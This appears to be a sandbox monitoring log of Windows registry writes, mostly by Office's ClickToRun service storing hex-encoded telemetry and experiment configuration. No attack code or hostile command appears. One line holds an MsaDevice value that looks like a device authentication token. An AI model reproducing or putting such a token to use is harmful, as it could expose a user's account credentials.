Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\0.8 = 225375624e616d657370616365735c22203a207b205c22436f617574685c22203a207b205c224576656e74735c22203a207b205c224f70656e46696c655c22203a207b205c224576656e74466c61675c22203a203330393632323437343338323231303536207d2c205c22457865637574654d65726765496e7374616e63655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224b69636b4f6666517569636b536176655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22586c53796e6353746174654368616e67654c697374656e65724f6e53796e6353746174654368616e67655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224f63734765744f70496e7465726e616c5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22436c6f7365576f726b626f6f6b5c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c224261636b67726f756e6451756575655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224f637350756c6c4f704f6e4765745265766973696f6e436f6d706c657465645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224f637350756c6c4f704f6e4765745265766973696f6e526573706f6e736552656365697665645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224f637350756c6c4f70464275696c644765745265766973696f6e526571756573745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224f637350756c6c4f704f6e436f6d706c657465645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22436865636b5061636b61676546696c6553746172745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22436865636b5061636b61676546696c6553746f705c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22436865636b456e637279707465644d6574726f46696c6553746172745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22436865636b456e637279707465644d6574726f46696c6553746f705c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22536b697070656443686743656c6c5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2243717532674872446f456e74657243656c6c466d6c61584c5c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c2246696c65536176655c22203a207b205c224576656e74735c22203a207b205c225361766541735361766546696c655c22203a207b205c224576656e74466c61675c22203a203330393632323437343338323231303536207d207d207d2c205c22496e6672615c22203a207b205c224576656e74735c22203a207b205c224164644c6f63616c655c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c22436f6d6d616e645c22203a207b205c224576656e74735c22203a207b205c2252656672657368416c6c5c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c22526566457874446174615c22203a207b205c224576656e74466c61675c22203a203438383936207d207d207d2c205c2243616c635c22203a207b205c224576656e74735c22203a207b205c224669784d616e75616c43616c634f6e4c6f61645c22203a207b205c224576656e74466c61675c22203a203438383936207d207d207d207d207d22207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54656c656d6574727944796e616d6963436f6e6669672e4578706572696d656e746174696f6e222c20225622203a20227374643a3a77737472696e677c7b205c224576656e74735c22203a207b205c224564676546657463685c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224c6f6164696e67466972737453657373696f6e43616368655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224765744665617475726573466f72534458556e65787065637465645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224142436f6e66696754726561746d656e7454797065556e65787065637465645c22203a207b205c224576656e74466c61675c22203a2032207d207d207d22207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54656c656d6574727944796e616d6963436f6e6669672e457874656e736962696c697479222c20225622203a20227374643a3a77737472696e677c7b205c225375624e616d657370616365735c22203a207b205c22446973636f7665725472794275795c22203a207b205c225375624e616d657370616365735c22203a207b205c2250795c22203a207b205c224576656e74735c22203a207b205c2253657276657244726976656e4e6f74696669636174696f6e55736572416374696f6e5c22203a207b205c224576656e74466c61675c22203a20323536207d207d207d207d207d2c205c224f66666963654a735c22203a207b205c224576656e74735c22203a207b205c22417070436f6d6d616e64446566696e6974696f6e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22417070496e697469616c697a6174696f6e585c22203a207b205c224576656e74466c61675c22203a2032207d2c205c225363726970744c6f6164585c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c22436174616c6f675c22203a207b205c224576656e74735c22203a207b205c2245786368616e67654765744c617374557064617465325c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22547279446973636f76657245777355726c735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2245786368616e67654765744c6173745570646174655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2254727948616e646c6541757468656e7469636174696f6e526573756c745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2245786368616e6765476574456e7469746c656d656e74735c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c2245786368616e67654765744d616e6966657374735c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c2245786368616e676552656672657368457874656e73696f6e4c6973745c22203a207b205c224576656e74466c61675c22203a20323536207d207d207d2c205c2241757468656e7469636174696f6e526963684170695c22203a207b205c224576656e74735c22203a207b205c22476574416363657373546f6b656e56324261636b67726f756e645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22476574416363657373546f6b656e56324d61696e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22476574416363657373546f6b656e5c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c2247657441757468546f6b656e5c22203a207b205c224576656e74466c61675c22203a20323536207d207d207d2c205c22496e7374616c6c65725c22203a207b205c225375624e616d657370616365735c22203a207b205c225461736b456e67696e655c22203a207b205c224576656e74735c22203a207b205c224765744368616e676564536f6c7574696f6e735461736b5c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c224765744368616e676564536f6c7574696f6e735461736b5265676973746572536f6c7574696f6e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224765744368616e676564536f6c7574696f6e735461736b52656769737465724e65757472616c5061636b6167655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22496e7374616c6c536478536f6c7574696f6e5461736b5363686564756c65645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22496e7374616c6c536478536f6c7574696f6e5461736b526567697374726174696f6e4572726f725c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22496e7374616c6c536478536f6c7574696f6e5461736b537563636573735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22496e7374616c6c536478536f6c7574696f6e5461736b496e46696e616c697a655374617465457863657074696f6e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22496e7374616c6c536478536f6c7574696f6e5461736b536574496e7374616c6c5374617475734572726f725c22203a207b205c224576656e74466c61675c22203a2032207d2c205c225061636b61676541707078457874726163746f725461736b5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c225061636b6167655265717565737465725461736b5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c225061636b6167655265717565737465725461736b53657276696365526571756573745374617475735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22457870466972737453657373696f6e5461736b446573747275637465644265666f7265436f6d706c6574655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22457870466972737453657373696f6e5461736b436f6d706c6574656446657463685c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22457870466972737453657373696f6e5461736b496e7374616c6c6564417070735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22457870466972737453657373696f6e5461736b4170704665746368446f6e655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c225061636b61676553617665725461736b5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224578705061636b616765526567697374726174696f6e496e666f5461736b5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c225061636b616765536f6c7574696f6e49445570646174655461736b5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224578747261637446696c6573546573745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2245787472616374466f6f747072696e7446696c6573546573745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22496e7374616c6c536478536f6c7574696f6e5461736b52756e4e657874457863657074696f6e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224f73664d616e696665737456616c696461746f725c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c224765744368616e676564536f6c7574696f6e735461736b52656769737465724c6f63616c655061636b6167655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2243496e7374616c6c65724d61696e5368656c6c476574436f6e66696755726c5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2253636176656e6765725461736b436c656172526567697374726174696f6e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22436865636b416e64557064617465416c6c536478536f6c7574696f6e735461736b5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22436865636b416e64557064617465416c6c536478536f6c7574696f6e735461736b5265676973746572536f6c7574696f6e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22436865636b416e64557064617465416c6c536478536f6c7574696f6e735461736b52656769737465724e65757472616c5061636b6167655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22436865636b416e64557064617465416c6c536478536f6c7574696f6e735461736b52656769737465724c6f63616c655061636b6167655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224765744368616e676564536f6c7574696f6e735461736b4c6f63616c65556e617661696c61626c655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224765744368616e676564536f6c7574696f6e735461736b5061636b616765556e617661696c61626c655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22496e7374616c6c536478536f6c7574696f6e5461736b5c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c2253636176656e6765725461736b5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2253636176656e6765725461736b436c656172526567697374726174696f6e4661696c65645c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c224d61696e5c22203a207b205c224576656e74735c22203a207b205c225344584261636b67726f756e645461736b5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224f7366496e7374616c6c65725374617274436f6d5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224f7366496e7374616c6c657253746172744e6f74434f4d5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2243496e7374616c6c65724d61696e5368656c6c496e69745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224f7366496e7374616c6c657253746172744d61696e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2243496e7374616c6c65724d61696e5368656c6c5363686564756c655461736b5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2243496e7374616c6c65724d61696e5368656c6c53687574646f776e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224765744e6574776f726b436f737454696d656f75745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224765744e6574776f726b436f737453657276696365556e617661696c61626c655c22203a207b205c224576656e74466c61675c22203a2032207d207d207d207d2c205c224576656e74735c22203a207b205c225061636b61676541707078457874726163746f725461736b5061636b616765496e666f726d6174696f6e5c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c2253616e64626f785c22203a207b205c224576656e74735c22203a207b205c22506f73744f7366436f6e74726f6c4d6573736167655c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c224f445041637469766174696f6e48616e67696e675c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c2253616e64626f784372656174696f6e5c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c2244656c6574654f7366436f6e74726f6c5c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c225365744f4d546f6b656e4f6e54726964656e74486f73745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2253657454726964656e74486f73745c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c224f445053686f775461736b70616e65436f6e74726f6c5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224372656174654f7366436f6e74726f6c56325c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c2243726561746552656d6f7465725c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c22446f776e6c6f61644d616e69666573745c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c2252656c6f6164416c6c4f7366436f6e74726f6c735c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c225265737461727452656d6f7465725c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c225265737461727453616e64626f7865735c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c2253746172744f7366436f6e74726f6c5c22203a207b205c224576656e74466c61675c22203a20323536207d207d207d2c205c22417070436f6d6d616e64735c22203a207b205c224576656e74735c22203a207b205c22526962626f6e5847656e657261746f725c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22417070436d6450726f6a656374696f6e5374617475735c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c224361636865446573657269616c697a6546726f6d53747265616d5c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c22436163686553657269616c697a65546f53747265616d5c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c224361636865536f6c7574696f6e5c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c22457773526566726573685c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c2245786563757465416374696f6e5c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c2246616c6c6261636b546f46697273744c6976654964496e4f454d5c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c2246616c6c6261636b546f46697273744c6976654964496e526962626f6e5c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c2246657463684361636865536f6c7574696f6e5c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c22496e7374616c6c4d616e696665737452656164795c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c224c6f61644d696e43616368655c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c224d69734d61746368696e67526962626f6e4964656e74697479496e666f5c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c225072657061726553686f775461736b70616e6556325c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c2252656d6f766546726f6d526962626f6e5c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c2253686f775465616368696e6743616c6c6f75745c22203a207b20 C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\Common\ClientTelemetry\Volatile\MsaDevice = "t=GwAWAbuEBAAUbVtUa9wjWgmEIwjX9d7dccnghw8OZgAAEPE2OxcrTn5pX9zOs1iGr9vgAFhNfa5K9FXYXTUgFB5y12eADXbMXR3zDWPpKuT1CTS53Fk6IySaretTRdhwmyRovnRL/34YuNKWV28619lQB5DVDv5ReqxndwFBdSOMWaiLGZ/bq+1WHKS09AkVJoFM5fDxVjSezK0QoJdzSTmGp0YsV+mmxddN9+r4cj2Z04sMBrQ5E5z51Pfo34Mgcp9gMTPJo9qFLPFvSDLcbUCk8RHyYTVWwdDOsmw7Uw4cPese2ZyyZ8TFCp+SZw87fwQVOofRa3jq/WjkBm9IYWetdXWFb6wPJ8OJaMR9n66TE/qcHwE=&p=" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133637932500772403" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2b C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,17110992,7202269,41484365,17110988,7153487,39965824,17962391,508368333,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\0.3 = 22203a20224d6963726f736f66742e4f66666963652e4964656e746974792e55736553706f436f6f6b696546726f6d53616d6554656e616e74222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4c6963656e73696e672e44617465546f5573654d6963726f736f6674333635466f72436f6e73756d657273222c20225622203a20227374643a3a77737472696e677c323032302d30342d32315430303a30303a30302e302b30303a303022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4c6963656e73696e672e44617465546f5573654d6963726f736f6674333635466f72534d42222c20225622203a20227374643a3a77737472696e677c323032302d30342d32315430303a30303a30302e302b30303a303022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4c6963656e73696e672e456e61626c6547726163655769746857414350726f6d6f427573426172222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4c6963656e73696e672e456e61626c654d6f6465726e41464f222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4c6963656e73696e672e486561727462656174446179734265666f726545787044617465222c20225622203a2022696e7433325f747c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4c6963656e73696e672e4e6f456e7469746c656d656e747353656c6653657276696365222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4c6963656e73696e672e4e6f456e7469746c656d656e74735472794275794578706572696d656e7454726561746d656e74222c20225622203a2022696e7433325f747c3222207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4c6963656e73696e672e53686f77564e6578745369676e4f75744469616c6f67222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4c6963656e73696e672e5573655265666163746f726564436f6e666967446570726f766973696f6e222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4c6963656e73696e672e5573655265666163746f726564476574557365724c6963656e7365222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4d616e6167656162696c6974792e436c6f7564506f6c6963792e4e6f6e5075626c6963436c6f7564222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4d616e6167656162696c6974792e54656e616e744173736f63696174696f6e4b65792e4e6f6e5075626c6963436c6f7564222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4d616e6167656162696c6974792e5573654f637073563255726c496e57696e222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4e616e63794f66666963655465616d2e7a686574616e34313232303231222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4f45502e416c6c6f7741626f7274517569636b436865636b45777353657276696365222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4f45502e416c6c6f7741626f7274517569636b436865636b4f6d657853657276696365222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4f45502e4368616e6765476174652e496e766f6b6546657463684d616e696665737443616c6c6261636b4f6e446f776e6c6f61644d616e6966657374222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4f45502e4368616e6765476174652e557365436c6f6e6564496e7374616e6365466f724572726f72222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4f45502e4368616e6765476174652e56616c6964617465446f776e6c6f61645265736f7572636573222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4f45502e4469616c6f6754776f5761794d6573736167696e67222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4f45502e456e61626c654d696e43616368655265667265736820222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4f45502e4964656e746974794361636865466f72636552656672657368222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4f45502e4f7366496e7374616c6c6572526567697374657242675461736b222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4f45502e506572557365724964656e746974794d696e4361636865222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4f45502e506572557365724964656e74697479526962626f6e4361636865222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4f45502e5765624b69743246756c6c4469616c6f67415049222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4f4d45582e456e61626c65456e7465727072697365436f6d416464696e536574436f6e6e656374496e7465726e616c5570646174654576656e7473222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4f4d45582e456e61626c65456e7465727072697365436f6d416464696e556e68616e646c6564457863657074696f6e4576656e7473222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4f6172742e456e61626c65416972537061636547726f757044726167466978222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4f6172742e456e61626c65496e736572744d6564696154656c656d65747279222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4f6e654e6f74652e4170706c652e43576f726b73706163655573657255736555726c46726f6d526177556e69636f6465537472696e67222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4f6e654e6f74652e4368616e6765476174652e53686f77494150456e747279222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4f6e654e6f74652e44656570426174636853746f7265456e61626c6564222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4f6e654e6f74652e52656e6465725570646174656457696e333252656458222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4f6e654e6f74652e53686f756c645573654e6574436f7374496e73746561644f664d736f426c6f636b696e67222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4f75746c6f6f6b2e4c6173744d696c6554656c656d6574727954726163657274222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4f75746c6f6f6b2e5063782e4c696e6b6564496e4b32466978222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4f75746c6f6f6b2e5063782e5063784a756e65323031394275674669786573222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4f75746c6f6f6b2e526970636f72642e33363134383230222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4f75746c6f6f6b2e526970636f72642e33393039323635222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e4f75746c6f6f6b2e526970636f72642e33393435323833222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5043582e526970636f72642e56534f2e33363432383036222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e506572666f726d616e63652e426c6f636b696e6757616974732e4f737250726f63657373222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e506572666f726d616e63652e4368616e6765476174652e586c426f6f74436f6d706c657465416674657246696c654f70656e416e6453706c61736853637265656e222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e506572736f6e616c697a6174696f6e2e456e61626c65476574496e736967687473222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e506572736f6e616c697a6174696f6e2e456e61626c6553656e645369676e616c222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e506572736f6e616c697a6174696f6e2e47657455736572466163747354696d656f75744d696c6c697365636f6e6473222c20225622203a2022696e7433325f747c3530303022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e506572736f6e616c697a6174696f6e2e557365476574496e736967687473466c6f77466f724665746368696e67476f7665726e616e636544617461222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e506f776572506f696e742e4368616e6765476174652e436865636b56696577496e536c6964654a616e69746f724f62736572766572222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e506f776572506f696e742e4368616e6765476174652e466f726365536f6674776172654d696e69617475726552656e646572696e67222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e506f776572506f696e742e4368616e6765476174652e4d657267652e5573655468726f77696e674c69666567756172645374657073222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e506f776572506f696e742e4368616e6765476174652e536c69646553686f772e52656c65617365536c69646553686f774d616e616765724265666f726547667853687574646f776e222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e506f776572506f696e742e48616e646c65434c524372617368222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e506f776572506f696e742e53756767657374696f6e732e456e61626c65436f6e74656e745265636f6d6d656e646174696f6e4974656d73222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e50726f6a6563742e50726f6a65637443325253657276657232303133436f6e6e656374696f6e426c6f636b222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e50726f6a6563742e50726f6a65637443656e74656e6e69616c53657276657232303133426c6f636b222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e50726f6a6563742e50726f6a65637443656e74656e6e69616c53657276657232303133436f6e6e656374696f6e426c6f636b222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e53656375726974792e434c502e5570646174655374617475734261724f6e50726f66696c65537769746368222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e53656375726974792e43656e7472616c697a6564457874656e73696f6e536166657479436865636b222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e53656375726974792e49524d2e5758505644697361626c654c6f616454656d706c617465734f6e426f6f74222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e53656375726974792e4973457874656e73696f6e496e4c697374557064617465222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e53656375726974792e4d6f6e69746f72656446696c65457874656e73696f6e4c697374222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e53656375726974792e50726f74656374696f6e536572766963652e4e657755784d6f64656c222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e53656375726974792e53686f756c6452756e436c6f75645365637572697479506f6c696379436865636b222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e53656375726974792e5573654e6f526566436f756e74416d736953747265616d222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5365676d656e746174696f6e2e436c6f7564222c20225622203a20227374643a3a77737472696e677c5075626c696322207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5365676d656e746174696f6e2e46617374465445222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5365676d656e746174696f6e2e4d53495442697a63686174416c6c6f776c697374222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5365676d656e746174696f6e2e4d6f636861222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5365676d656e746174696f6e2e4f584f416c6c222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5365676d656e746174696f6e2e50657270657475616c4c6963656e7365222c20225622203a20227374643a3a77737472696e677c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5365676d656e746174696f6e2e5365676d656e74222c20225622203a20227374643a3a77737472696e677c4e4f4e4652444322207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5365676d656e746174696f6e2e56657273696f6e506172746974696f6e222c20225622203a20227374643a3a77737472696e677c57696e3332416e64726f6964486f7422207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5365676d656e746174696f6e2e576f7264436f70696c6f74446f67666f6f64222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e416c6c6f775a65726f4c656e677468536561726368537472696e67222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e4175746f436f727265637455492e41637469766974696573222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e4175746f446973636f7665722e4275674669786573466f7252657472794661696c65645265717565737473222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e4175746f446973636f7665